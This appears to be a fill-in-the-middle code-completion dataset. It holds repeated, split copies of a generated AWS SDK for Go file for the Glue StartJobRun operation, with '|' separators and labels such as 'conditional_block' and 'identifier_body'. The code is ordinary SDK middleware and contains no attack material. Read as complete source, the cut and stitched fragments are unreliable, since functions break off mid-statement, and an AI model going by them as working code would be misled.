if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil |
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack, options); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addStartJobRunResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = addOpStartJobRunValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opStartJobRun(options.Region), middleware.Before); err != nil {
return err
}
if err = awsmiddleware.AddRecursionDetection(stack); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
if err = addendpointDisableHTTPSMiddleware(stack, options); err != nil {
return err
}
return nil
}
func newServiceMetadataMiddleware_opStartJobRun(region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "glue",
OperationName: "StartJobRun",
}
}
type opStartJobRunResolveEndpointMiddleware struct {
EndpointResolver EndpointResolverV2
BuiltInResolver builtInParameterResolver
}
func (*opStartJobRunResolveEndpointMiddleware) ID() string {
return "ResolveEndpointV2"
}
func (m *opStartJobRunResolveEndpointMiddleware) HandleSerialize(ctx context.Context, in middleware.SerializeInput, next middleware.SerializeHandler) (
out middleware.SerializeOutput, metadata middleware.Metadata, err error,
) {
if awsmiddleware.GetRequiresLegacyEndpoints(ctx) {
return next.HandleSerialize(ctx, in)
}
req, ok := in.Request.(*smithyhttp.Request)
if !ok {
return out, metadata, fmt.Errorf("unknown transport type %T", in.Request)
}
if m.EndpointResolver == nil {
return out, metadata, fmt.Errorf("expected endpoint resolver to not be nil")
}
params := EndpointParameters{}
m.BuiltInResolver.ResolveBuiltIns(¶ms)
var resolvedEndpoint smithyendpoints.Endpoint
resolvedEndpoint, err = m.EndpointResolver.ResolveEndpoint(ctx, params)
if err != nil {
return out, metadata, fmt.Errorf("failed to resolve service endpoint, %w", err)
}
req.URL = &resolvedEndpoint.URI
for k := range resolvedEndpoint.Headers {
req.Header.Set(
k,
resolvedEndpoint.Headers.Get(k),
)
}
authSchemes, err := internalauth.GetAuthenticationSchemes(&resolvedEndpoint.Properties)
if err != nil {
var nfe *internalauth.NoAuthenticationSchemesFoundError
if errors.As(err, &nfe) {
// if no auth scheme is found, default to sigv4
signingName := "glue"
signingRegion := m.BuiltInResolver.(*builtInResolver).Region
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
}
var ue *internalauth.UnSupportedAuthenticationSchemeSpecifiedError
if errors.As(err, &ue) {
return out, metadata, fmt.Errorf(
"This operation requests signer version(s) %v but the client only supports %v",
ue.UnsupportedSchemes,
internalauth.SupportedSchemes,
)
}
}
for _, authScheme := range authSchemes {
switch authScheme.(type) {
case *internalauth.AuthenticationSchemeV4:
v4Scheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4)
var signingName, signingRegion string
if v4Scheme.SigningName == nil {
signingName = "glue"
} else {
signingName = *v4Scheme.SigningName
}
if v4Scheme.SigningRegion == nil {
signingRegion = m.BuiltInResolver.(*builtInResolver).Region
} else {
signingRegion = *v4Scheme.SigningRegion
}
if v4Scheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4Scheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
break
case *internalauth.AuthenticationSchemeV4A:
v4aScheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4A)
if v4aScheme.SigningName == nil {
v4aScheme.SigningName = aws.String("glue")
}
if v4aScheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4aScheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, *v4aScheme.SigningName)
ctx = awsmiddleware.SetSigningRegion(ctx, v4aScheme.SigningRegionSet[0])
break
case *internalauth.AuthenticationSchemeNone:
break
}
}
return next.HandleSerialize(ctx, in)
}
func addStartJobRunResolveEndpointMiddleware(stack *middleware.Stack, options Options) error {
return stack.Serialize.Insert(&opStartJobRunResolveEndpointMiddleware{
EndpointResolver: options.EndpointResolverV2,
BuiltInResolver: &builtInResolver{
Region: options.Region,
UseDualStack: options.EndpointOptions.UseDualStackEndpoint,
UseFIPS: options.EndpointOptions.UseFIPSEndpoint,
Endpoint: options.BaseEndpoint,
},
}, "ResolveEndpoint", middleware.After)
}
| {
return err
} | conditional_block |
api_op_StartJobRun.go | // Code generated by smithy-go-codegen DO NOT EDIT.
package glue
import (
"context"
"errors"
"fmt"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
internalauth "github.com/aws/aws-sdk-go-v2/internal/auth"
"github.com/aws/aws-sdk-go-v2/service/glue/types"
smithyendpoints "github.com/aws/smithy-go/endpoints"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Starts a job run using a job definition.
func (c *Client) StartJobRun(ctx context.Context, params *StartJobRunInput, optFns ...func(*Options)) (*StartJobRunOutput, error) {
if params == nil {
params = &StartJobRunInput{}
}
result, metadata, err := c.invokeOperation(ctx, "StartJobRun", params, optFns, c.addOperationStartJobRunMiddlewares)
if err != nil {
return nil, err
}
out := result.(*StartJobRunOutput)
out.ResultMetadata = metadata
return out, nil
}
type StartJobRunInput struct {
// The name of the job definition to use.
//
// This member is required.
JobName *string
// This field is deprecated. Use MaxCapacity instead. The number of Glue data
// processing units (DPUs) to allocate to this JobRun. You can allocate a minimum
// of 2 DPUs; the default is 10. A DPU is a relative measure of processing power
// that consists of 4 vCPUs of compute capacity and 16 GB of memory. For more
// information, see the Glue pricing page (https://aws.amazon.com/glue/pricing/) .
//
// Deprecated: This property is deprecated, use MaxCapacity instead.
AllocatedCapacity int32
// The job arguments associated with this run. For this job run, they replace the
// default arguments set in the job definition itself. You can specify arguments
// here that your own job-execution script consumes, as well as arguments that Glue
// itself consumes. Job arguments may be logged. Do not pass plaintext secrets as
// arguments. Retrieve secrets from a Glue Connection, Secrets Manager or other
// secret management mechanism if you intend to keep them within the Job. For
// information about how to specify and consume your own Job arguments, see the
// Calling Glue APIs in Python (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-calling.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Spark jobs, see the Special Parameters
// Used by Glue (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-glue-arguments.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Ray jobs, see Using job parameters in
// Ray jobs (https://docs.aws.amazon.com/glue/latest/dg/author-job-ray-job-parameters.html)
// in the developer guide.
Arguments map[string]string
// Indicates whether the job is run with a standard or flexible execution class.
// The standard execution-class is ideal for time-sensitive workloads that require
// fast job startup and dedicated resources. The flexible execution class is
// appropriate for time-insensitive jobs whose start and completion times may vary.
// Only jobs with Glue version 3.0 and above and command type glueetl will be
// allowed to set ExecutionClass to FLEX . The flexible execution class is
// available for Spark jobs.
ExecutionClass types.ExecutionClass
// The ID of a previous JobRun to retry.
JobRunId *string
// For Glue version 1.0 or earlier jobs, using the standard worker type, the
// number of Glue data processing units (DPUs) that can be allocated when this job
// runs. A DPU is a relative measure of processing power that consists of 4 vCPUs
// of compute capacity and 16 GB of memory. For more information, see the Glue
// pricing page (https://aws.amazon.com/glue/pricing/) . For Glue version 2.0+
// jobs, you cannot specify a Maximum capacity . Instead, you should specify a
// Worker type and the Number of workers . Do not set MaxCapacity if using
// WorkerType and NumberOfWorkers . The value that can be allocated for MaxCapacity
// depends on whether you are running a Python shell job, an Apache Spark ETL job,
// or an Apache Spark streaming ETL job:
// - When you specify a Python shell job ( JobCommand.Name ="pythonshell"), you
// can allocate either 0.0625 or 1 DPU. The default is 0.0625 DPU.
// - When you specify an Apache Spark ETL job ( JobCommand.Name ="glueetl") or
// Apache Spark streaming ETL job ( JobCommand.Name ="gluestreaming"), you can
// allocate from 2 to 100 DPUs. The default is 10 DPUs. This job type cannot have a
// fractional DPU allocation.
MaxCapacity *float64
// Specifies configuration properties of a job run notification.
NotificationProperty *types.NotificationProperty
// The number of workers of a defined workerType that are allocated when a job
// runs.
NumberOfWorkers *int32
// The name of the SecurityConfiguration structure to be used with this job run.
SecurityConfiguration *string
// The JobRun timeout in minutes. This is the maximum time that a job run can
// consume resources before it is terminated and enters TIMEOUT status. This value
// overrides the timeout value set in the parent job. Streaming jobs do not have a
// timeout. The default for non-streaming jobs is 2,880 minutes (48 hours).
Timeout *int32
// The type of predefined worker that is allocated when a job runs. Accepts a
// value of G.1X, G.2X, G.4X, G.8X or G.025X for Spark jobs. Accepts the value Z.2X
// for Ray jobs.
// - For the G.1X worker type, each worker maps to 1 DPU (4 vCPUs, 16 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.2X worker type, each worker maps to 2 DPU (8 vCPUs, 32 GB of
// memory) with 128GB disk (approximately 77GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.4X worker type, each worker maps to 4 DPU (16 vCPUs, 64 GB of
// memory) with 256GB disk (approximately 235GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs in the following
// Amazon Web Services Regions: US East (Ohio), US East (N. Virginia), US West
// (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo),
// Canada (Central), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm).
// - For the G.8X worker type, each worker maps to 8 DPU (32 vCPUs, 128 GB of
// memory) with 512GB disk (approximately 487GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs, in the same Amazon
// Web Services Regions as supported for the G.4X worker type.
// - For the G.025X worker type, each worker maps to 0.25 DPU (2 vCPUs, 4 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for low volume streaming jobs. This worker
// type is only available for Glue version 3.0 streaming jobs.
// - For the Z.2X worker type, each worker maps to 2 M-DPU (8vCPUs, 64 GB of
// memory) with 128 GB disk (approximately 120GB free), and provides up to 8 Ray
// workers based on the autoscaler.
WorkerType types.WorkerType
noSmithyDocumentSerde
}
type StartJobRunOutput struct {
// The ID assigned to this job run.
JobRunId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationStartJobRunMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
if err = addlegacyEndpointContextSetter(stack, options); err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack, options); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addStartJobRunResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = addOpStartJobRunValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opStartJobRun(options.Region), middleware.Before); err != nil {
return err
}
if err = awsmiddleware.AddRecursionDetection(stack); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
if err = addendpointDisableHTTPSMiddleware(stack, options); err != nil {
return err
}
return nil
}
func newServiceMetadataMiddleware_opStartJobRun(region string) *awsmiddleware.RegisterServiceMetadata |
type opStartJobRunResolveEndpointMiddleware struct {
EndpointResolver EndpointResolverV2
BuiltInResolver builtInParameterResolver
}
func (*opStartJobRunResolveEndpointMiddleware) ID() string {
return "ResolveEndpointV2"
}
func (m *opStartJobRunResolveEndpointMiddleware) HandleSerialize(ctx context.Context, in middleware.SerializeInput, next middleware.SerializeHandler) (
out middleware.SerializeOutput, metadata middleware.Metadata, err error,
) {
if awsmiddleware.GetRequiresLegacyEndpoints(ctx) {
return next.HandleSerialize(ctx, in)
}
req, ok := in.Request.(*smithyhttp.Request)
if !ok {
return out, metadata, fmt.Errorf("unknown transport type %T", in.Request)
}
if m.EndpointResolver == nil {
return out, metadata, fmt.Errorf("expected endpoint resolver to not be nil")
}
params := EndpointParameters{}
m.BuiltInResolver.ResolveBuiltIns(¶ms)
var resolvedEndpoint smithyendpoints.Endpoint
resolvedEndpoint, err = m.EndpointResolver.ResolveEndpoint(ctx, params)
if err != nil {
return out, metadata, fmt.Errorf("failed to resolve service endpoint, %w", err)
}
req.URL = &resolvedEndpoint.URI
for k := range resolvedEndpoint.Headers {
req.Header.Set(
k,
resolvedEndpoint.Headers.Get(k),
)
}
authSchemes, err := internalauth.GetAuthenticationSchemes(&resolvedEndpoint.Properties)
if err != nil {
var nfe *internalauth.NoAuthenticationSchemesFoundError
if errors.As(err, &nfe) {
// if no auth scheme is found, default to sigv4
signingName := "glue"
signingRegion := m.BuiltInResolver.(*builtInResolver).Region
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
}
var ue *internalauth.UnSupportedAuthenticationSchemeSpecifiedError
if errors.As(err, &ue) {
return out, metadata, fmt.Errorf(
"This operation requests signer version(s) %v but the client only supports %v",
ue.UnsupportedSchemes,
internalauth.SupportedSchemes,
)
}
}
for _, authScheme := range authSchemes {
switch authScheme.(type) {
case *internalauth.AuthenticationSchemeV4:
v4Scheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4)
var signingName, signingRegion string
if v4Scheme.SigningName == nil {
signingName = "glue"
} else {
signingName = *v4Scheme.SigningName
}
if v4Scheme.SigningRegion == nil {
signingRegion = m.BuiltInResolver.(*builtInResolver).Region
} else {
signingRegion = *v4Scheme.SigningRegion
}
if v4Scheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4Scheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
break
case *internalauth.AuthenticationSchemeV4A:
v4aScheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4A)
if v4aScheme.SigningName == nil {
v4aScheme.SigningName = aws.String("glue")
}
if v4aScheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4aScheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, *v4aScheme.SigningName)
ctx = awsmiddleware.SetSigningRegion(ctx, v4aScheme.SigningRegionSet[0])
break
case *internalauth.AuthenticationSchemeNone:
break
}
}
return next.HandleSerialize(ctx, in)
}
func addStartJobRunResolveEndpointMiddleware(stack *middleware.Stack, options Options) error {
return stack.Serialize.Insert(&opStartJobRunResolveEndpointMiddleware{
EndpointResolver: options.EndpointResolverV2,
BuiltInResolver: &builtInResolver{
Region: options.Region,
UseDualStack: options.EndpointOptions.UseDualStackEndpoint,
UseFIPS: options.EndpointOptions.UseFIPSEndpoint,
Endpoint: options.BaseEndpoint,
},
}, "ResolveEndpoint", middleware.After)
}
| {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "glue",
OperationName: "StartJobRun",
}
} | identifier_body |
api_op_StartJobRun.go | // Code generated by smithy-go-codegen DO NOT EDIT.
package glue
import (
"context" | "fmt"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
internalauth "github.com/aws/aws-sdk-go-v2/internal/auth"
"github.com/aws/aws-sdk-go-v2/service/glue/types"
smithyendpoints "github.com/aws/smithy-go/endpoints"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Starts a job run using a job definition.
func (c *Client) StartJobRun(ctx context.Context, params *StartJobRunInput, optFns ...func(*Options)) (*StartJobRunOutput, error) {
if params == nil {
params = &StartJobRunInput{}
}
result, metadata, err := c.invokeOperation(ctx, "StartJobRun", params, optFns, c.addOperationStartJobRunMiddlewares)
if err != nil {
return nil, err
}
out := result.(*StartJobRunOutput)
out.ResultMetadata = metadata
return out, nil
}
type StartJobRunInput struct {
// The name of the job definition to use.
//
// This member is required.
JobName *string
// This field is deprecated. Use MaxCapacity instead. The number of Glue data
// processing units (DPUs) to allocate to this JobRun. You can allocate a minimum
// of 2 DPUs; the default is 10. A DPU is a relative measure of processing power
// that consists of 4 vCPUs of compute capacity and 16 GB of memory. For more
// information, see the Glue pricing page (https://aws.amazon.com/glue/pricing/) .
//
// Deprecated: This property is deprecated, use MaxCapacity instead.
AllocatedCapacity int32
// The job arguments associated with this run. For this job run, they replace the
// default arguments set in the job definition itself. You can specify arguments
// here that your own job-execution script consumes, as well as arguments that Glue
// itself consumes. Job arguments may be logged. Do not pass plaintext secrets as
// arguments. Retrieve secrets from a Glue Connection, Secrets Manager or other
// secret management mechanism if you intend to keep them within the Job. For
// information about how to specify and consume your own Job arguments, see the
// Calling Glue APIs in Python (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-calling.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Spark jobs, see the Special Parameters
// Used by Glue (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-glue-arguments.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Ray jobs, see Using job parameters in
// Ray jobs (https://docs.aws.amazon.com/glue/latest/dg/author-job-ray-job-parameters.html)
// in the developer guide.
Arguments map[string]string
// Indicates whether the job is run with a standard or flexible execution class.
// The standard execution-class is ideal for time-sensitive workloads that require
// fast job startup and dedicated resources. The flexible execution class is
// appropriate for time-insensitive jobs whose start and completion times may vary.
// Only jobs with Glue version 3.0 and above and command type glueetl will be
// allowed to set ExecutionClass to FLEX . The flexible execution class is
// available for Spark jobs.
ExecutionClass types.ExecutionClass
// The ID of a previous JobRun to retry.
JobRunId *string
// For Glue version 1.0 or earlier jobs, using the standard worker type, the
// number of Glue data processing units (DPUs) that can be allocated when this job
// runs. A DPU is a relative measure of processing power that consists of 4 vCPUs
// of compute capacity and 16 GB of memory. For more information, see the Glue
// pricing page (https://aws.amazon.com/glue/pricing/) . For Glue version 2.0+
// jobs, you cannot specify a Maximum capacity . Instead, you should specify a
// Worker type and the Number of workers . Do not set MaxCapacity if using
// WorkerType and NumberOfWorkers . The value that can be allocated for MaxCapacity
// depends on whether you are running a Python shell job, an Apache Spark ETL job,
// or an Apache Spark streaming ETL job:
// - When you specify a Python shell job ( JobCommand.Name ="pythonshell"), you
// can allocate either 0.0625 or 1 DPU. The default is 0.0625 DPU.
// - When you specify an Apache Spark ETL job ( JobCommand.Name ="glueetl") or
// Apache Spark streaming ETL job ( JobCommand.Name ="gluestreaming"), you can
// allocate from 2 to 100 DPUs. The default is 10 DPUs. This job type cannot have a
// fractional DPU allocation.
MaxCapacity *float64
// Specifies configuration properties of a job run notification.
NotificationProperty *types.NotificationProperty
// The number of workers of a defined workerType that are allocated when a job
// runs.
NumberOfWorkers *int32
// The name of the SecurityConfiguration structure to be used with this job run.
SecurityConfiguration *string
// The JobRun timeout in minutes. This is the maximum time that a job run can
// consume resources before it is terminated and enters TIMEOUT status. This value
// overrides the timeout value set in the parent job. Streaming jobs do not have a
// timeout. The default for non-streaming jobs is 2,880 minutes (48 hours).
Timeout *int32
// The type of predefined worker that is allocated when a job runs. Accepts a
// value of G.1X, G.2X, G.4X, G.8X or G.025X for Spark jobs. Accepts the value Z.2X
// for Ray jobs.
// - For the G.1X worker type, each worker maps to 1 DPU (4 vCPUs, 16 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.2X worker type, each worker maps to 2 DPU (8 vCPUs, 32 GB of
// memory) with 128GB disk (approximately 77GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.4X worker type, each worker maps to 4 DPU (16 vCPUs, 64 GB of
// memory) with 256GB disk (approximately 235GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs in the following
// Amazon Web Services Regions: US East (Ohio), US East (N. Virginia), US West
// (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo),
// Canada (Central), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm).
// - For the G.8X worker type, each worker maps to 8 DPU (32 vCPUs, 128 GB of
// memory) with 512GB disk (approximately 487GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs, in the same Amazon
// Web Services Regions as supported for the G.4X worker type.
// - For the G.025X worker type, each worker maps to 0.25 DPU (2 vCPUs, 4 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for low volume streaming jobs. This worker
// type is only available for Glue version 3.0 streaming jobs.
// - For the Z.2X worker type, each worker maps to 2 M-DPU (8vCPUs, 64 GB of
// memory) with 128 GB disk (approximately 120GB free), and provides up to 8 Ray
// workers based on the autoscaler.
WorkerType types.WorkerType
noSmithyDocumentSerde
}
type StartJobRunOutput struct {
// The ID assigned to this job run.
JobRunId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationStartJobRunMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
if err = addlegacyEndpointContextSetter(stack, options); err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack, options); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addStartJobRunResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = addOpStartJobRunValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opStartJobRun(options.Region), middleware.Before); err != nil {
return err
}
if err = awsmiddleware.AddRecursionDetection(stack); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
if err = addendpointDisableHTTPSMiddleware(stack, options); err != nil {
return err
}
return nil
}
func newServiceMetadataMiddleware_opStartJobRun(region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "glue",
OperationName: "StartJobRun",
}
}
type opStartJobRunResolveEndpointMiddleware struct {
EndpointResolver EndpointResolverV2
BuiltInResolver builtInParameterResolver
}
func (*opStartJobRunResolveEndpointMiddleware) ID() string {
return "ResolveEndpointV2"
}
func (m *opStartJobRunResolveEndpointMiddleware) HandleSerialize(ctx context.Context, in middleware.SerializeInput, next middleware.SerializeHandler) (
out middleware.SerializeOutput, metadata middleware.Metadata, err error,
) {
if awsmiddleware.GetRequiresLegacyEndpoints(ctx) {
return next.HandleSerialize(ctx, in)
}
req, ok := in.Request.(*smithyhttp.Request)
if !ok {
return out, metadata, fmt.Errorf("unknown transport type %T", in.Request)
}
if m.EndpointResolver == nil {
return out, metadata, fmt.Errorf("expected endpoint resolver to not be nil")
}
params := EndpointParameters{}
m.BuiltInResolver.ResolveBuiltIns(¶ms)
var resolvedEndpoint smithyendpoints.Endpoint
resolvedEndpoint, err = m.EndpointResolver.ResolveEndpoint(ctx, params)
if err != nil {
return out, metadata, fmt.Errorf("failed to resolve service endpoint, %w", err)
}
req.URL = &resolvedEndpoint.URI
for k := range resolvedEndpoint.Headers {
req.Header.Set(
k,
resolvedEndpoint.Headers.Get(k),
)
}
authSchemes, err := internalauth.GetAuthenticationSchemes(&resolvedEndpoint.Properties)
if err != nil {
var nfe *internalauth.NoAuthenticationSchemesFoundError
if errors.As(err, &nfe) {
// if no auth scheme is found, default to sigv4
signingName := "glue"
signingRegion := m.BuiltInResolver.(*builtInResolver).Region
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
}
var ue *internalauth.UnSupportedAuthenticationSchemeSpecifiedError
if errors.As(err, &ue) {
return out, metadata, fmt.Errorf(
"This operation requests signer version(s) %v but the client only supports %v",
ue.UnsupportedSchemes,
internalauth.SupportedSchemes,
)
}
}
for _, authScheme := range authSchemes {
switch authScheme.(type) {
case *internalauth.AuthenticationSchemeV4:
v4Scheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4)
var signingName, signingRegion string
if v4Scheme.SigningName == nil {
signingName = "glue"
} else {
signingName = *v4Scheme.SigningName
}
if v4Scheme.SigningRegion == nil {
signingRegion = m.BuiltInResolver.(*builtInResolver).Region
} else {
signingRegion = *v4Scheme.SigningRegion
}
if v4Scheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4Scheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
break
case *internalauth.AuthenticationSchemeV4A:
v4aScheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4A)
if v4aScheme.SigningName == nil {
v4aScheme.SigningName = aws.String("glue")
}
if v4aScheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4aScheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, *v4aScheme.SigningName)
ctx = awsmiddleware.SetSigningRegion(ctx, v4aScheme.SigningRegionSet[0])
break
case *internalauth.AuthenticationSchemeNone:
break
}
}
return next.HandleSerialize(ctx, in)
}
func addStartJobRunResolveEndpointMiddleware(stack *middleware.Stack, options Options) error {
return stack.Serialize.Insert(&opStartJobRunResolveEndpointMiddleware{
EndpointResolver: options.EndpointResolverV2,
BuiltInResolver: &builtInResolver{
Region: options.Region,
